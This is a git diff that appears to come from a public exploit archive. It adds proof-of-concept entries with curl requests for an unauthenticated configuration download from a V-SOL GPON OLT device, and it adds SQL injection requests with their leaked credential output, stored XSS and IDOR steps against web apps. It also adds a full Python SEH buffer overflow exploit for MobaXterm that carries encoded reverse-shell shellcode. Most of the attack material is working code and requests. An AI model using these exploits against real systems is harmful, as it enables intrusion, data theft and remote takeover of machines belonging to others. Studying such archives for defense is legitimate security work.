diff --git a/exploits/hardware/webapps/47433.txt b/exploits/hardware/webapps/47433.txt
new file mode 100644
index 000000000..3a48eafc1
--- /dev/null
+++ b/exploits/hardware/webapps/47433.txt
@@ -0,0 +1,47 @@
+# Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download
+# Date: 2019-09-27
+# Author: LiquidWorm
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
+configuration download and information disclosure vulnerability when direct
+object reference is made to the usrcfg.conf file using an HTTP GET method. This
+will enable the attacker to disclose sensitive information and help her in
+authentication bypass, privilege escalation and/or full system access.
+
+Tested on: GoAhead-Webs
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5534
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php
+
+25.09.2019
+
+--
+# PoC
+
+1# curl http://192.168.8.200/device/usrcfg.conf
+2# curl http://192.168.8.201/action/usrcfg.conf
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47434.txt b/exploits/hardware/webapps/47434.txt
new file mode 100644
index 000000000..822a1b397
--- /dev/null
+++ b/exploits/hardware/webapps/47434.txt
@@ -0,0 +1,71 @@
+# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery
+# Author: LiquidWorm
+# Discovery Date: 2019-09-26
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Tested on: GoAhead-Webs
+# Advisory ID: ZSL-2019-5536
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+CSRF add admin:
+---------------
+
+
+
+
+
+
+
+
+CSRF enable SSH:
+----------------
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47435.txt b/exploits/hardware/webapps/47435.txt
new file mode 100644
index 000000000..40e0b96b0
--- /dev/null
+++ b/exploits/hardware/webapps/47435.txt
@@ -0,0 +1,80 @@
+# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation
+# Author: LiquidWorm
+# Discovery Date: 2019-09-26
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Tested on: GoAhead-Webs
+# Advisory ID: ZSL-2019-5538
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+
+V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
+
+
+Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+Product web page: https://www.vsolcn.com
+Affected version: V2.03.62R_IPv6
+ V2.03.54R
+ V2.03.52R
+ V2.03.49
+ V2.03.47
+ V2.03.40
+ V2.03.26
+ V2.03.24
+ V1.8.6
+ V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application suffers from a privilege escalation vulnerability.
+Normal user can elevate his/her privileges by sending a HTTP POST request
+setting the parameter 'user_role_mod' to integer value '1' gaining admin
+rights.
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/47426.txt b/exploits/php/webapps/47426.txt
index 264048ab9..8a0a9e3bc 100644
--- a/exploits/php/webapps/47426.txt
+++ b/exploits/php/webapps/47426.txt
@@ -5,10 +5,9 @@
# Version: 4.15
# CVE: N/A
-
-# A malicious query can be sent in base64 encoding to unserialize() function.
-# It can be deserialized as an array without any sanitization then.
-# After it, each element of the array is passed directly to the SQL query.
+# A malicious query can be sent in base64 encoding to unserialize() function.
+# It can be deserialized without any sanitization then.
+# After it, it gets passed directly to the SQL query.
#!/bin/python
diff --git a/exploits/php/webapps/47428.txt b/exploits/php/webapps/47428.txt
new file mode 100644
index 000000000..9bd9b8fa1
--- /dev/null
+++ b/exploits/php/webapps/47428.txt
@@ -0,0 +1,43 @@
+# Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting
+# Google Dork: None
+# Date: 2019-09-14
+# Exploit Author: strider
+# Vendor: http://inoideas.org/
+# Software Link: https://github.com/inoerp/inoERP
+# Version: 0.7.2
+# Tested on: Debian 10 Buster x64 / Kali Linux
+# CVE : None
+
+====================================[Description]====================================
+There is a security flaw on the comment section, which allows to make persistant xss without any authentication.
+An attacker could use this flaw to gain cookies to get into a account of registered users.
+
+
+====================================[Vulnerability]====================================
+extensions/comment/post_comment.php in the server part
+$$extension = new $extension;
+
+ foreach ($field_array as $key => $value) {
+ if (!empty($_POST[$value])) {
+ $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities
+ } else {
+ $$extension->$value = "";
+ }
+ }
+
+includes/functions/functions.inc in the server part
+function mysql_prep($value) {
+ return $value; <-- just returns the value
+}
+
+====================================[Proof of Concept]====================================
+Step 1:
+http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7
+
+Step 2:
+open a new question and submit it.
+
+Step 3:
+then paste this PoC-Code below into the comment field and submit that
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/47430.txt b/exploits/php/webapps/47430.txt
new file mode 100644
index 000000000..0364a4c48
--- /dev/null
+++ b/exploits/php/webapps/47430.txt
@@ -0,0 +1,45 @@
+# Exploit Title: thesystem 1.0 - 'server_name' SQL Injection
+# Author: Sadik Cetin
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
+# Software Link: https://github.com/kostasmitroglou/thesystem
+# Tested Version: 1.0
+# Tested on OS: Windows 10
+# CVE: N/A
+
+# Description:
+# Simple SQL injection after login bypass(login_required didn't used)
+
+POST /data/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------18467633426500
+Content-Length: 330
+Connection: close
+Referer: http://127.0.0.1:8000/data/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+
+-----------------------------18467633426500
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+
+9LsPWlffpiAEGYeCvR9Bead9tslR18flkZRAjREhmqtJpFwNrnSBJXTH245O5sh3
+-----------------------------18467633426500
+Content-Disposition: form-data; name="server_name"
+
+' or '1=1
+-----------------------------18467633426500--
+
+
+
+HTTP/1.1 200 OK
+Date: Thu, 26 Sep 2019 12:16:11 GMT
+Server: WSGIServer/0.2 CPython/3.5.3
+Content-Type: text/html; charset=utf-8
+X-Frame-Options: SAMEORIGIN
+Content-Length: 190
+
+(23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, 'Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')
\ No newline at end of file
diff --git a/exploits/php/webapps/47431.txt b/exploits/php/webapps/47431.txt
new file mode 100644
index 000000000..7d105eab5
--- /dev/null
+++ b/exploits/php/webapps/47431.txt
@@ -0,0 +1,60 @@
+# Exploit Title: thesystem App 1.0 - Persistent Cross-Site Scripting
+# Author: İsmail Güngör
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
+# Software Link: https://github.com/kostasmitroglou/thesystem
+# Tested Version: 1.0
+# Tested on OS: Windows 10
+# CVE: N/A
+
+# Description:
+# Stored XSS after login bypass(login_required didn't used)
+
+First of all following request is sent web server
+
+POST /data/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------191691572411478
+Content-Length: 332
+Connection: close
+Referer: http://127.0.0.1:8000/data/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+
+-----------------------------191691572411478
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+
+0sryZfN7NDe4UUwhjehPQxPRtaMSq85nbGQjmLc9KL79DBOsfK0Plkvp2MwPus75
+-----------------------------191691572411478
+Content-Disposition: form-data; name="server_name"
+
+test
+-----------------------------191691572411478--
+
+After following request is sent web server
+
+GET /show_search/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://127.0.0.1:8000/data/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+
+# Finally, response is shown Xtored XSS:
+
+HTTP/1.1 200 OK
+Date: Thu, 26 Sep 2019 12:25:19 GMT
+Server: WSGIServer/0.2 CPython/3.5.3
+Content-Type: text/html; charset=utf-8
+X-Frame-Options: SAMEORIGIN
+Content-Length: 176
+
+('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', 'test')('2019-09-26 15:23:50.367709', '')
\ No newline at end of file
diff --git a/exploits/php/webapps/47432.txt b/exploits/php/webapps/47432.txt
new file mode 100644
index 000000000..9e6e54aa2
--- /dev/null
+++ b/exploits/php/webapps/47432.txt
@@ -0,0 +1,38 @@
+# Exploit Title: thesystem App 1.0 - 'username' SQL Injection
+# Author: Anıl Baran Yelken
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
+# Software Link: https://github.com/kostasmitroglou/thesystem
+# Tested Version: 1.0
+# Tested on OS: Windows 10
+# CVE: N/A
+# Description:
+# Simple SQL injection after login bypass(login_required didn't used)
+
+POST /check_users/ HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------54363239114604
+Content-Length: 327
+Connection: close
+Referer: http://127.0.0.1:8000/check_users/
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977
+Upgrade-Insecure-Requests: 1
+-----------------------------54363239114604
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+lZVnIo12dzwRuJbCXjjr7cVAQKa4qwhBwdk85Uq4aHpWdqtNTP2rCZB8pmU1uQjj
+-----------------------------54363239114604
+Content-Disposition: form-data; name="username"
+' or '1=1
+-----------------------------54363239114604--
+
+HTTP/1.1 200 OK
+Date: Thu, 26 Sep 2019 12:40:24 GMT
+Server: WSGIServer/0.2 CPython/3.5.3
+Content-Type: text/html; charset=utf-8
+X-Frame-Options: SAMEORIGIN
+Content-Length: 34
+User:('test', '1234', 'test@test')
\ No newline at end of file
diff --git a/exploits/php/webapps/47436.txt b/exploits/php/webapps/47436.txt
new file mode 100644
index 000000000..81564d32a
--- /dev/null
+++ b/exploits/php/webapps/47436.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
+# Google Dork: inurl:/wp-content/themes/zoner/
+# Date: 2019-09-24
+# Exploit Author: m0ze
+# Vendor Homepage: https://fruitfulcode.com/
+# Software Link: https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226
+# Version: 4.1.1
+# Tested on: Parrot OS
+
+
+----[]- Persistent XSS: -[]----
+Create a new agent account, log in and press the blue «Plus» button under
+the main menu («Add Your Property» text will pop-up on hover) - you will be
+redirected to https://zoner.demo-website.com/?add-property=XXXX page. Use
+your payload inside «Address» input field («Local information» block),
+press on the «Create Property» button and check your payload on the
+https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
+page. Your new property must be approved by admin, so this is a good point
+to steal some cookies :)
+
+Payload Sample: ">
+
+PoC: log in as agentm0ze:WhgZbOUH (login/password) and go to the
+https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
+page.
+
+
+----[]- IDOR: -[]----
+Create a new agent account, log in and create a new property. Then go to
+the
+https://zoner.fruitfulcode.com/author/aaaagent/?profile-page=my_properties
+page and pay attention to the trash icon under your property info. Open the
+developers console and check out this code: . Edit the
+data-propertyid="XXX" attribute by typing instead of XXX desired post or
+page ID which you want to delete (you can get post/page ID on the
+tag class -> postid-494, so attribute for post with ID 494 will be
+data-propertyid="494"). After you edit the ID, click on the trash icon and
+confirm deletion (POST
+https://zoner.fruitfulcode.com/wp-admin/admin-ajax.php?action=delete_property_act&property_id=494&security=1304db23f0).
+Funny fact that you can delete ANY post & page (!) you want, security key
+is not unique for each requests so it's possible to erase all pages and
+posts within a few minutes.
\ No newline at end of file
diff --git a/exploits/windows/remote/47429.py b/exploits/windows/remote/47429.py
new file mode 100755
index 000000000..7f34eb7f3
--- /dev/null
+++ b/exploits/windows/remote/47429.py
@@ -0,0 +1,118 @@
+# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
+# Author: Xavi Beltran
+# Date: 2019-08-31
+# Vendor: xavibel.com
+# Vedor Page: https://mobaxterm.mobatek.net/download.html
+# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
+# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/
+
+# Description:
+# SEH based Buffer Overflow in the Username field of a valid session
+# This exploit generates a malicious MobaXterm sessions file
+# When the user double clicks in the session, the shellcode is going to be executed
+# You need to adapt the exploit to your current OS Windows version
+
+#!/usr/bin/env python
+
+# This is not the IP address of the reverse shell
+# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
+
+ip_address = "192.168.1.88"
+port = "22"
+
+# We are going to recreate a MobaXterm sessions file export
+print ("[+] Creating the malicious MobaXterm file...")
+sessions_file = ""
+sessions_file += "[Bookmarks]\n"
+sessions_file += "SubRep=\n"
+sessions_file += "ImgNum=42\n"
+sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"
+
+# Here is the SEH Based Buffer Overflow part
+
+# [*] Exact match at offset 16672
+# We have to substract 4 that corresponds to NSEH
+junk1 = "A" * 16668
+
+# Here we need to jump forward but EB is a bad char
+# We decrease ESP and use a conditional jump after
+# I have learned this trick in OSCE. Thank you Muts
+nseh = ""
+nseh += "\x4C" # DEC ESP
+nseh += "\x4C" # DEC ESP
+nseh += "\x77\x21" # JA SHORT 1035FE59
+
+# Using a XP-SP1 so modules are compiled without SafeSEH
+# !mona seh -cp asciiprint
+# 0x762C5042 POP-POP-RET crypt32.dll
+seh = "\x42\x50\x2C\x76"
+
+# Some padding that we are going to jump over it
+junk2 = "\x42" * 29
+
+# We recover the initial state of the stack
+alignment = ""
+alignment += "\x44" # INC ESP
+alignment += "\x44" # INC ESP
+
+
+# And we reach our shellcode
+# A0 is a badchar but the generated encoded shellcode won't use it
+# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
+# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
+# Shellcode 636 bytes
+shellcode = ""
+shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
+shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"
+shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"
+shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"
+shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"
+shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"
+shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"
+shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"
+shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"
+shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"
+shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"
+shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"
+shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"
+shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"
+shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"
+shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"
+shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"
+shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"
+shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"
+shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"
+shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"
+shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"
+shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"
+shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"
+shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"
+shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"
+shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"
+shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"
+shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"
+shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"
+shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"
+shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"
+shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"
+shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"
+shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"
+shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"
+shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"
+shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"
+shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"
+
+crash = junk1 + nseh + seh + junk2 + alignment + shellcode
+
+# We need to mantain the MobaXterm sessions file structure
+sessions_file += crash
+sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%%%0#0# #-1"
+
+# We generate the file
+f = open( 'pwnd.mxtsessions', 'w' )
+f.write(sessions_file)
+f.close()
+
+print ("[+] pwnd.mxtsessions file created!")
+print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8af18ebd6..d2ba25f5c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17683,6 +17683,7 @@ id,file,description,date,author,type,platform,port
47408,exploits/watchos/remote/47408.py,"HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure",2019-09-23,"Lazy Hacker",remote,watchos,
47412,exploits/windows/remote/47412.py,"File Sharing Wizard 1.5.0 - POST SEH Overflow",2019-09-24,x00pwn,remote,windows,80
47416,exploits/windows/remote/47416.rb,"Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free (Metasploit)",2019-09-24,Metasploit,remote,windows,3389
+47429,exploits/windows/remote/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41764,4 +41765,12 @@ id,file,description,date,author,type,platform,port
47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php,
+47431,exploits/php/webapps/47431.txt,"thesystem App 1.0 - Persistent Cross-Site Scripting",2019-09-27,"İsmail Güngör",webapps,php,
47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,
+47428,exploits/php/webapps/47428.txt,"InoERP 0.7.2 - Persistent Cross-Site Scripting",2019-09-27,strider,webapps,php,
+47430,exploits/php/webapps/47430.txt,"thesystem App 1.0 - 'server_name' SQL Injection",2019-09-27,"Sadik Cetin",webapps,php,
+47432,exploits/php/webapps/47432.txt,"thesystem App 1.0 - 'username' SQL Injection",2019-09-27,"Anıl Baran Yelken",webapps,php,
+47433,exploits/hardware/webapps/47433.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download",2019-09-27,LiquidWorm,webapps,hardware,
+47434,exploits/hardware/webapps/47434.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery",2019-09-27,LiquidWorm,webapps,hardware,
+47435,exploits/hardware/webapps/47435.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation",2019-09-27,LiquidWorm,webapps,hardware,
+47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,